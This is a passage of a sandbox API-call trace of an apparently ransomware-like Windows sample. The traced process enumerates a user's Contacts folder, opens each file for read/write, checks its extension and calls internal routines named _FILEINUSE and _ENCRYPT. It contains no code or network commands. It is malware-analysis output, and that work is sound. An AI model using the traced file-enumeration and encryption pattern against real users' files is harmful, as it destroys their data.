dwCmpFlags=0x1, lpString1="inistrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nistrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="istrator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="strator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="trator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ator.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tor.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="or.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r.flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0158.024] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flyingship.contact\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 2 [0158.024] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.024] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.024] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.024] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.025] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.025] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.025] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.025] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.025] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.025] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.026] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.026] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.026] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.026] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.026] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.026] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.026] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0158.027] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.027] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.027] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.027] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.027] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.027] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.027] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.027] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.027] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 0x90add8 [0158.027] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.028] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.028] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 0x90add8 [0158.028] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.028] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.028] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.028] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.028] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.028] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.028] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.028] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.028] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.028] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.028] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.028] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.030] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.030] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.030] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.030] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.030] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.030] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.030] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0158.031] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.031] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.031] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.031] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.031] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.031] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.031] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.031] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.031] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 0x90add8 [0158.032] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.032] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.032] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 0x90add8 [0158.032] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.032] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.032] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.032] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.032] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.032] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.032] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.032] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.032] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.032] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.032] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.032] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.033] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.033] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.033] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.033] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.033] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.033] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.033] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0158.033] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.033] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.033] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.033] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.033] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.034] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.034] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.034] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.034] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0158.034] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.034] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.034] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0158.034] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0158.034] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.034] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.034] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.034] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.034] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.034] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.034] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.034] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.035] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.035] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.035] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0158.036] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.036] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.036] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.036] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.036] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.036] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.036] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0158.037] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.037] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.037] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.037] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.037] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.037] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.037] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.038] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.038] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 